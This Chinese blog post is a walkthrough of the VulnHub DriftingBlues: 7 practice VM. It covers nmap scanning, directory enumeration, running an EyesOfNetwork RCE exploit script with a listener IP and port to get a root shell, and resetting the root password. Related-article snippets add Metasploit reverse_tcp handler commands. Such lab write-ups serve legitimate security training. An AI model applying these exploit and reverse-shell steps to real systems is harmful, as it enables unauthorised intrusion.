VulnHub 之 DRIFTINGBLUES: 7

最新推荐文章于 2024-04-29 18:30:00 发布
最新推荐文章于 2024-04-29 18:30:00 发布
阅读量904 收藏
点赞数 1
分类专栏: VulnHub 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42075643/article/details/116142549
版权
本文介绍了在Vulnhub靶机平台上对DRIFTINGBLUES: 7进行渗透测试的过程。推荐使用virtualBox或VMware,以kali为攻击机。先总结测试思路,包括探测ip端口、根据端口测试、突破web、查看源码等。接着导入虚拟机,通过一系列操作如扫描目录、找exp等,最终拿到flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Vulnhub是一个很好的靶机平台,想看官网点这里

今天学习DRIFTINGBLUES: 7,点击这里下载哦~

推荐使用virtualBox,我这里是VMware,看自己条件使用

难度:简单

基础练习,大佬可以绕过

这里我先总结一下,整个测试过程中的问题与情况:
(至于为什么要在开始做总结,主要是给各位新手朋友提供一个思路,不要直接照着我的抄)
1、 拿到一个测试站的时候,首先就是探测ip端口,因为有了门才要一步一步进入
2、 找到端口以后根据自己掌握的渗透手法,先自行判断哪里薄弱,根据端口去测试
3、一般web比较好突破(看自己)
4、然后看源码先自己判断,然后扫目录,看注入,找cms,看版本,找exp,等等这里就看自己的积累。
5、 多练习,不怕麻烦,多熟悉,我们一起坚持,与诸君共勉~

接下来导入虚拟机,这里选择NAT模式,成功后,如图:
在这里插入图片描述
这里使用kali作为攻击机,首先查看kali的ip:

在这里插入图片描述

使用nmap来探测靶机ip:

nmap -sS 192.198.81.0/24

在这里插入图片描述
可以看到有80端口,先去浏览器找找线索:
在这里插入图片描述
是一个network登录界面,试试若口令,爆破啥的

很遗憾,啥也没爆出来,试试扫描目录:

这里使用的是dirsearch,GitHub上边就有,搜一下就能找到,挺好用的

在这里插入图片描述
没啥有用的信息,不过找到了EON的版本信息:
在这里插入图片描述
找找exp,在这里

给执行权限:

chmod +x eonrce.py

在这里插入图片描述
利用exp:

/eonrce.py https://192.168.81.147/ -ip 192.168.81.148 -port 8888

成功:
在这里插入图片描述

修改密码

passwd root

在这里插入图片描述
这里我将密码改为root

因为之前ssh端口22开着呢,直接ssh连接:

ssh 192.168.81.147

在这里插入图片描述
查看里边信息:
在这里插入图片描述
拿到flag,成功~

Vulnhub —— DriftingBlues系列
7ruth0hn的博客
11-27 852
文章目录写在前面思路DriftingBlues: 11.nmap扫描Tip:若靶机无法获取IP:2.漏洞探测与利用3.提权DriftingBlues: 2结语参考资料 写在前面 取证学习告一段落了,虽然个人赛失手了,但团体赛一等奖还是可以接受的。开始拖了很久的渗透学习 渗透工具: Nmap v7.91、gobuster、DIRB v2.22、crunch version 3.6、Hydra v9.1、pspy - version: v1.2.0 思路 DriftingBlues: 1 在官网下载ova文件
vulnhub靶机DriftingBlues: 2渗透笔记
liver100day的博客
07-26 1045
文章目录环境准备1. 信息收集1.1 主机发现1.2 端口扫描1.3 访问80端口(http服务)2.漏洞利用2.1 ftp匿名登录漏洞2.2 爆破目录 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 1. 信息收集 1.1 主机发现 使用arp-scan -l获取目标靶机IP地址 arp-scan -l 扫描局域网所有设备
vulnhub实战——DRIFTINGBLUES: 7
Ar_Gin Work
04-18 762
vulnhub实战——Driftingblues7 前言 无聊发现vulnhub上一个新靶机,下载来玩玩看,挺简单的。搜了搜没教程就写个教程给大家参考一下吧~ 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 可以直接用VM打开,ip会自动获取并显示出来(挺人性化的) 正文 通过nmap扫描靶机nmap -sV -O 192.168.171.134 发现有80端口,我们访问一下发现为一个登录页面,后台名称为EyesOfNetwork 再目录
vulnhub靶机 | DriftingBlues:7
在下小黄的博客
06-07 1241
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: vulnhub靶机 | DriftingBlues:7 靶机解题过程及思路 微信公众号回复:【靶机】,即可获取本文全部涉及到的工具。 创建时间:2021年6月7日 软件: MindMaster Pro、kali、DriftingBlues:7靶机 DriftingBlues:7靶机解题过程及思路前言:信息搜
Vulnhub:DRIFTINGBLUES: 7
NeverForgetCX的博客
02-28 3257
前言: 在朋友的推荐下,空余时间中下载了vulnhub的随机靶机DRIFTINGBLUES:7,尝试实战 靶机在Vulnhub官网下载镜像,完成后可直接用VM打开虚拟机;努力成为专业白帽子!!! 信息收集: 攻击机kali:192.168.2.87 靶机ip:192.168.2.90 打开靶机竟然直接看见了ip信息 IP:192.168.2.90 直接登入kali使用nmap端口扫描 nmap -sV 192.168...
[Vulnhub靶机] DriftingBlues: 7
网安日记本的博客
02-16 1629
[Vulnhub靶机] DriftingBlues: 7靶机渗透思路及方法(个人分享)
vulnhub--driftingblues:2
venu_s的博客
06-03 490
靶机介绍 difficult:easy goal:get flags download:https://download.vulnhub.com/driftingblues/driftingblues2.ova 信息探测 主机发现 端口扫描 目标主机开放了21端口,有一张图片,可以匿名登陆;此外还开放了22端口和80端口 访问ftp,下载图片,图片不知道有啥用,先放着 80端口目录扫描 可以看出目标主机使用了WordPress,访问80端口 查看源码,就是一张图片 访问/blog,发现是一些博客
vulnhub--DriftingBlues:6复现超详细过程
m0_54024658的博客
06-05 485
下载靶机并且导入VMware masscan扫描存活主机,发现目标靶机192.168.152.225,并且开启了80端口 masscan -p80 192.168.152.0/24 --rate=2000 访问靶机的80端口,查看原代码,没有什么发现,想办法找页面的文件目录 ==Nmap -p- -sC -sV 192.168.152.225 --min-rate=2000 -vv == 详细扫描IP,发现了一个文件robots.txt,访问一下。 访问robots.txt文件发现一个目录,和提示目录
vulnhub靶机 | DriftingBlues:7 write-up
xj28555的博客
05-04 8423
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 题目的目标是要夺到里面的flag,搭建好环境如图。 首先用nmap扫描一下ip地址 nmap-sP192.168.110.1/24#扫描网段中存活主机 nmap-p-192.168.110.167 #在看看上面运行的服务 nmap-sV192.168.110.167#查看服务版本 上面运行的一些apache、...
Vulnhub靶机:driftingblues 7
qq_48904485的博客
01-19 483
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:driftingblues7(10.0.2.23)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
【靶场系列】driftingblues7
qq_41169485的博客
04-23 562
扫到一个.bash_history文件,下载查看,根据历史命令推测该目录下还存在一个eon文件。访问80端口,自动跳转到443端口,该cms是eyesofnetwork。根据查找到的EyesOfNetwork漏洞,选了一个可以rce的开始利用。使用john爆破zip密码,得到压缩包密码为killah。推测该账号密码是443端口的web页面登录密码,成功登录。搜索该cms的漏洞,可以看到该cms有很多漏洞。解码可知该文件是zip文件,因为有PK头。解码得到压缩包,但是需要密码才能打开。
靶机渗透练习07-driftingblues7
hirak0的博客
04-14 752
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-7,680/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. 一、搭建靶机环境
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-7
Aluxian_的博客
06-24 1520
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 下载好了把安装包解压 然后试用VMware即可。kali里使用发现主机 渗透机:kali IP :192.168.205.
Vulnhub-DriftingBlues:7
从不专注的人的博客
06-08 230
Vulnhub-DriftingBlues:7 目录Vulnhub-DriftingBlues:7信息收集扫描目标网段查看端口及服务查看服务运行的版本访问网站提升权限运行脚本 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 信息收集 扫描目标网段 nmap -sP 172.16.58.0/24 查看端口及服务 nmap -p- 172.16.58.135 查看服务运行的版本 nmap -sV 172.16.58.135 访问
Vulnhub_driftingblues
m0_60936698的博客
03-12 1642
主机信息 kali: 192.168.58.128 driftingblues3: 192.168.58.131 信息收集 老规矩先用nmap扫描 nmap -sP ip/mask \\扫描局域网内存活主机 nmap -sV -A -p- ip \\扫描靶机开放服务 发现开启了俩个端口 22:ssh 80:http ssh登入,且用户名为一句话木马 进入网页瞅瞅(啥也不是) 用dirb盘一下,用字典来扫描Web服务,找找目录 注:(dirb是一个基于...
vulnhubdriftingblues7_vh
鲨鱼辣椒的博客
06-09 697
目录 信息搜集 扫描网段 扫描IP地址 扫描网站目录 查看网站 发现漏洞 GETSHELL 总结 信息搜集 扫描网段 发现网站真实IP 扫描IP地址 发现开启的端口以及服务,以及中间件的一些版本信息(这可能会是我们后续渗透的突破点) 扫描网站目录 dirsearch -u https://192.168.179.137/ 虽然我并没有扫出什么有用的东西,但是这个扫的动作很重要,有时候就是一些不起眼的地方会给我们意想不到的惊喜(一定要注重细节,对于我们渗透.
Vulnhub-DriftingBlues-7
weixin_50342860的博客
08-16 529
@TOC 简介 靶机下载:DriftingBlue-7 运行环境: 攻击机:kali 受害机:DriftingBlues-7 目标:夺到里面的flag 下载好靶机,直接打开(这里使用的是VM,模式选择NAT),如图 信息收集 扫描当前网段存活主机 查看端口及运行服务 查看服务版本 目录扫描 dirsearch 安装方法:点这里 扫描出来的目录没啥大发现 发现漏洞及利用漏洞 访问80端口会被跳转到如下页面 尝试了弱口令,暴力破解都没有猜解到密码,所以我们可以先去扫描一下它的目录结构。
vulnhub靶场之driftingblues-7,9
qq_58091216的博客
04-29 290
我们在/home/目录下发现了clapton文件夹,里面有user.txt,我们进行查看,发现了第一个flag。我们查看源代码,发现版本号是ApPHP MicroBlog v.1.0.1,我们可以进行搜索漏洞。我们访问80端口可以看到是一个登录页面,可能是爆破用户名和密码,其他端口都没有有用的信息。我们可以看到反弹成功,我们切换用户clapton/yaraklitepe。我们还看到了一个note.txt文件,我们进行查看,发现是一个提示。开启的端口有点多,首先我们一个一个进行渗透测试,我们先渗透靶场7
VulnHub-DRIFTINGBLUES: 3
sanqin_的博客
07-11 724
靶机 DHCP 未能正确分配 IP :看这里 靶机地址:http://www.vulnhub.com/entry/driftingblues-3,656/ 按照流程先用nmap扫描 nmap -sP ip/mask #扫描局域网内存活主机 nmap -sV -A -p- ip #扫描靶机开放服务 可见开发了两个端口,22:ssh,80:http 在网站一阵遨游后没发现啥(其实就随便看看),上dirb robots.txt给出了一个目录 访问,提示说ssh有问题,并且又给出一个目录, 这次页面提
vulnhub靶机 driftingblues2
最新发布
01-04
### 关于VulnHub DriftingBlues2靶机详情 #### 靶机概述 DriftingBlues系列是VulnHub平台上提供给安全爱好者练习渗透测试技能的一组虚拟机镜像。这些靶机设计用于帮助用户提升其在网络攻防方面的能力,特别是针对Web应用的安全评估技巧。 对于特定的`DriftingBlues: 2`版本而言,此靶机旨在模拟真实世界中的信息系统环境,并设置了多个层次的任务来挑战玩家的技术水平[^4]。 #### 渗透测试流程 ##### 信息收集阶段 在这个过程中,首要任务是从外部视角了解目标系统的开放服务及其配置情况。通常采用的方法包括但不限于: - **主机发现**:通过网络扫描工具(如Nmap)识别活动主机并确定其IP地址范围。 - **端口和服务枚举**:进一步探测已知存活节点上的可用端口以及运行的服务类型和版本号。 由于`DriftingBlues: 2`的具体内部结构未完全公开,在实际操作前需自行探索更多细节以制定后续行动计划。 ##### 漏洞利用实践 一旦完成了初步的情报搜集工作,则可以根据所获数据选择合适的攻击向量实施入侵行为。例如,如果发现了某个存在已知漏洞的应用程序实例,则可考虑运用Metasploit Framework (MSF) 或其他自动化平台来进行针对性打击。 值得注意的是,在处理此类实验性质较强的项目时,建议遵循官方指南或社区分享的经验贴作为参考依据,以便更高效地完成整个过程[^5]。 ```bash # 使用Nmap进行基本的TCP SYN扫描 nmap -sS <target_ip> # 利用Metasploit加载exploit模块 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST <your_local_IP> run ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值